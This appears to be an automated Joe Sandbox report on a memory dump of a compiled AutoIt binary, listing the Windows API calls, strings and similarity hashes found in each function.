Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: e542c96cb7c2f4e3966f658f667571cda23876aea0ebb204269639845480317f
Instruction ID: 6c7ba68d521827ffcbb88b4874b3786f10cbaf9173f1d4ae58654e9ecfe84f00
Opcode Fuzzy Hash: e542c96cb7c2f4e3966f658f667571cda23876aea0ebb204269639845480317f
Instruction Fuzzy Hash: A421F5352042107BEB155B75AC09E7F7B98DF49711F105529FC09FA1A1EF619C4497A0

Function 00E8B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00E02612: GetWindowLongW.USER32(?,000000EB), ref: 00E02623

GetWindowLongW.USER32(?,000000F0), ref: 00E8B192
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00E8B1B7
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00E8B1CF
GetSystemMetrics.USER32(00000004), ref: 00E8B1F8
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00E70E90,00000000), ref: 00E8B216

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 6515aa4b52c82ce9b4a01e04d90f663e34346dd2155a27e6b801b6942adec6d0
Instruction ID: 1b1311efc6baca723db54ccc7e02abe3ea2fc0a4159d6aefa0265d345888d51d
Opcode Fuzzy Hash: 6515aa4b52c82ce9b4a01e04d90f663e34346dd2155a27e6b801b6942adec6d0
Instruction Fuzzy Hash: DA219172911251AFCB14AF39DC18A6A3BA4FB05325F145738F93EF71E0E73098559B90

Function 00E59307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E59320

Part of subcall function 00E07BCC: _memmove.LIBCMT ref: 00E07C06

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E59352
__itow.LIBCMT ref: 00E5936A
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E59392
__itow.LIBCMT ref: 00E593A3

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: b97a8a34cf131faba86f580534c88053055bf15c0c9d36dc3e76cfa56dec120c
Instruction ID: c76793d35303d9f51c10825ef00b3e81142956d5104a8f61b96a1792d2d9f564
Opcode Fuzzy Hash: b97a8a34cf131faba86f580534c88053055bf15c0c9d36dc3e76cfa56dec120c
Instruction Fuzzy Hash: 19210731B00308FBDB10AB618C89EEE7BA9EF88715F046425FD48F71C2D6B09D499791

Function 00E75A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00E75A6E
GetForegroundWindow.USER32 ref: 00E75A85
GetDC.USER32(00000000), ref: 00E75AC1
GetPixel.GDI32(00000000,?,00000003), ref: 00E75ACD
ReleaseDC.USER32(00000000,00000003), ref: 00E75B08

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 5f80e24089c55087cc9007e486f56fdccd2c18c5cb96cd7ac05423cf5e2237a3
Instruction ID: 1a2d2e6fd01dde35e7ace102b8ee89e0f8ec1929004db5fa1853d52b1e22f541
Opcode Fuzzy Hash: 5f80e24089c55087cc9007e486f56fdccd2c18c5cb96cd7ac05423cf5e2237a3
Instruction Fuzzy Hash: 6121C336A00204AFDB04EF65DD88A9ABBE5EF58350F14C179F849E7362DA70BC44DB90

Function 00E012F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E0134D
SelectObject.GDI32(?,00000000), ref: 00E0135C
BeginPath.GDI32(?), ref: 00E01373
SelectObject.GDI32(?,00000000), ref: 00E0139C

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: f76a97daac63b70872238a6eab85781c7a84cb97a4663b999beb275bf2673856
Instruction ID: 0cd92a6a7cacda647067a94a0b95ce7790d3245a0252115695e59e1b8314df22
Opcode Fuzzy Hash: f76a97daac63b70872238a6eab85781c7a84cb97a4663b999beb275bf2673856
Instruction Fuzzy Hash: 30214F32800604DFDB159F16EC09B6D7BA8EB00355F55427AF414BA1F0D776A8DADB50

Function 00E5BC9E Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00E5BCB3
_memcmp.LIBCMT ref: 00E5BCD1
_memcmp.LIBCMT ref: 00E5BCE4
_memcmp.LIBCMT ref: 00E5BCFC
_memcmp.LIBCMT ref: 00E5BD14

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: ae05565b830a7a265c2a520ce7c499c86e821303d59b70c12871043403c7121f
Instruction ID: 7dbb46154c3bc20f4e3fba54b4baafee9f4039dd96e584d8e00b9958742cbcbb
Opcode Fuzzy Hash: ae05565b830a7a265c2a520ce7c499c86e821303d59b70c12871043403c7121f
Instruction Fuzzy Hash: 0B01B5B16002197BDA046B11AD42FFBF39CDE20389B196825FE19B6342FB51DE1482A4

Function 00E64A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00E64ABA
__beginthreadex.LIBCMT ref: 00E64AD8
MessageBoxW.USER32(?,?,?,?), ref: 00E64AED
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00E64B03
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00E64B0A

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 6501f84c2c54c0a11c923ea288172e18ca3230ba80a8c732c3745392958c58cd
Instruction ID: 99a33329deacf55581dc9bba6b4d614f5690ba6fbb3933bd3611b4d7b6b6018e
Opcode Fuzzy Hash: 6501f84c2c54c0a11c923ea288172e18ca3230ba80a8c732c3745392958c58cd
Instruction Fuzzy Hash: DC1108B6905218BFC7009FA9EC08E9B7FECEB45360F144265F815F32A1D675D94887A0

Function 00E58202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E5821E
GetLastError.KERNEL32(?,00E57CE2,?,?,?), ref: 00E58228
GetProcessHeap.KERNEL32(00000008,?,?,00E57CE2,?,?,?), ref: 00E58237
HeapAlloc.KERNEL32(00000000,?,00E57CE2,?,?,?), ref: 00E5823E
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E58255

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 28bfbf8c5ee9f959bbd5d3c950983d20b2d33eca0b5ffbb6449c0720146deeb7
Instruction ID: e04d4e01b0c665b705eade41a0249e62c6573db14e2488e3e369285ae92af8f9
Opcode Fuzzy Hash: 28bfbf8c5ee9f959bbd5d3c950983d20b2d33eca0b5ffbb6449c0720146deeb7
Instruction Fuzzy Hash: 27016D75601204BFDB204FA6DD48D6B7FACFF8A755B500929FC09E2220DA318C18DB60

Function 00E5710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E57044,80070057,?,?,?,00E57455), ref: 00E57127
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E57044,80070057,?,?), ref: 00E57142
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E57044,80070057,?,?), ref: 00E57150
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E57044,80070057,?), ref: 00E57160
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E57044,80070057,?,?), ref: 00E5716C

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: c4d5a342b48e72f4e3e39c344adfcaf188ea0bf0a13e99c5bf228ce628d45aa3
Instruction ID: 1963d9afad58e75a3f6887c74006910d3ddfbb3526fffe96ba7ed432212887f2
Opcode Fuzzy Hash: c4d5a342b48e72f4e3e39c344adfcaf188ea0bf0a13e99c5bf228ce628d45aa3
Instruction Fuzzy Hash: CD01DF72602604BFCB144F66ED44BAA7BADEF44792F100464FD88E2220DB31DD188BA0

Function 00E65244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E65260
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00E6526E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E65276
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00E65280
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E652BC

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: c5e8f389dfe2fe17bbb9d27191ce418e22e6c8dc741c92207ee5c215b57e02f8
Instruction ID: ac7958866f4732b012b09d17e670cf787a8d769f6651a1278a607239e9c8548c
Opcode Fuzzy Hash: c5e8f389dfe2fe17bbb9d27191ce418e22e6c8dc741c92207ee5c215b57e02f8
Instruction Fuzzy Hash: AD015732E42A29DBCF00EFE5EC989EDBB78FB09711F401456E945F2161CB3055548BA1

Function 00E5810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E58121
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E5812B
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E5813A
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E58141
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E58157

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: d18807c80b875cabef408977b73f16265055043b32e5cfbb7fc3995551877c17
Instruction ID: f5079eefb673988cf39e962a5d6179df1ced81358eaa1cc77120b049553686d3
Opcode Fuzzy Hash: d18807c80b875cabef408977b73f16265055043b32e5cfbb7fc3995551877c17
Instruction Fuzzy Hash: FEF0C270202304AFEB110FA6ED8CE673BACFF49759B100425F949F2151DB60DC09EB60

Function 00E5C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00E5C1F7
GetWindowTextW.USER32(00000000,?,00000100), ref: 00E5C20E
MessageBeep.USER32(00000000), ref: 00E5C226
KillTimer.USER32(?,0000040A), ref: 00E5C242
EndDialog.USER32(?,00000001), ref: 00E5C25C

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: dddd8d0a36e5f578a12a5564215d376c07ffc0fbcbf9176d3ced824489f32b3d
Instruction ID: b6893e3ccfa1acaf44fb5f25a069c441cda6f93f69e777bb9d50dbaa1e811f16
Opcode Fuzzy Hash: dddd8d0a36e5f578a12a5564215d376c07ffc0fbcbf9176d3ced824489f32b3d
Instruction Fuzzy Hash: D901A234404704AFEB205B61ED5EB9677B8BB00B06F100669E986B14F0DBE4A98C9B90

Function 00E013B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00E013BF
StrokeAndFillPath.GDI32(?,?,00E3B888,00000000,?), ref: 00E013DB
SelectObject.GDI32(?,00000000), ref: 00E013EE
DeleteObject.GDI32 ref: 00E01401
StrokePath.GDI32(?), ref: 00E0141C

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: e0af359788ba7016d89806fb691569d9d8b411627e6e3446b13e750e624a2fbb
Instruction ID: b8b0feaad721f917429dfd6e92a44a73260bcc9218df46d21fbce9587d7e1b84
Opcode Fuzzy Hash: e0af359788ba7016d89806fb691569d9d8b411627e6e3446b13e750e624a2fbb
Instruction Fuzzy Hash: 88F0C932004A08EFDB195F27ED4CB583BA5A71132AF189275E429A90F1CB3659DADF50

Function 00E6C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00E6C432
CoCreateInstance.OLE32(00E92D6C,00000000,00000001,00E92BDC,?), ref: 00E6C44A

Part of subcall function 00E07DE1: _memmove.LIBCMT ref: 00E07E22

CoUninitialize.OLE32 ref: 00E6C6B7

Strings

.lnk, xrefs: 00E6C3C6, 00E6C3EE, 00E6C3F8

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: 6cae7e78811dfb650ac293248375e402b32bb16c4fd27b2d995de1ad8150b863
Instruction ID: b04f8d99de322dfcf29fe4c3e6c1f792aba2b27c570abe37630a7b926ea7d8b7
Opcode Fuzzy Hash: 6cae7e78811dfb650ac293248375e402b32bb16c4fd27b2d995de1ad8150b863
Instruction Fuzzy Hash: 84A14BB1104205AFD704EF54C881EAFB7E8FF85344F00592DF595A72A2EB71EA49CB62

Function 00E12CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00E20DB6: std::exception::exception.LIBCMT ref: 00E20DEC
Part of subcall function 00E20DB6: __CxxThrowException@8.LIBCMT ref: 00E20E01

Part of subcall function 00E07DE1: _memmove.LIBCMT ref: 00E07E22

Part of subcall function 00E07A51: _memmove.LIBCMT ref: 00E07AAB

__swprintf.LIBCMT ref: 00E12ECD

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00E12D66

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 543bc06e9fef64a6fd901c1a31e15d7e7cb1a17c552e7b2abc9cf36e9ce28ef7
Instruction ID: 0aee539532ab63246e85241a70a8800d127a37797b9932f954d9ece9f8f14441
Opcode Fuzzy Hash: 543bc06e9fef64a6fd901c1a31e15d7e7cb1a17c552e7b2abc9cf36e9ce28ef7
Instruction Fuzzy Hash: 1D916D715082159FCB14EF24D885CAFB7E8EF85714F00691DF596BB2A2EA30ED84CB52

Function 00E6B93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00E04750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E04743,?,?,00E037AE,?), ref: 00E04770

CoInitialize.OLE32(00000000), ref: 00E6B9BB
CoCreateInstance.OLE32(00E92D6C,00000000,00000001,00E92BDC,?), ref: 00E6B9D4
CoUninitialize.OLE32 ref: 00E6B9F1

Part of subcall function 00E09837: __itow.LIBCMT ref: 00E09862
Part of subcall function 00E09837: __swprintf.LIBCMT ref: 00E098AC

Strings

.lnk, xrefs: 00E6B99D, 00E6B9AB

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 82abaecf0167d088ba125a92e5542744694e2e40432b884899635e6432752c3a
Instruction ID: 4249a42017392ebc9a52df9df312026d8a99ea1064cce771524107457bb10250
Opcode Fuzzy Hash: 82abaecf0167d088ba125a92e5542744694e2e40432b884899635e6432752c3a
Instruction Fuzzy Hash: 8AA16A756043059FCB04DF14C884D6ABBE5FF89324F149998F899AB3A2CB31ED85CB91

Function 00E5B2F3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 00E5B4BE

Strings

Container, xrefs: 00E5B43B
AutoIt3GUI, xrefs: 00E5B436
%, xrefs: 00E5B561

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container$%
API String ID: 3565006973-1286912533
Opcode ID: f404f3165a2045c73c195194a28fc91a48cec6bd203475c2c189e07888728f89
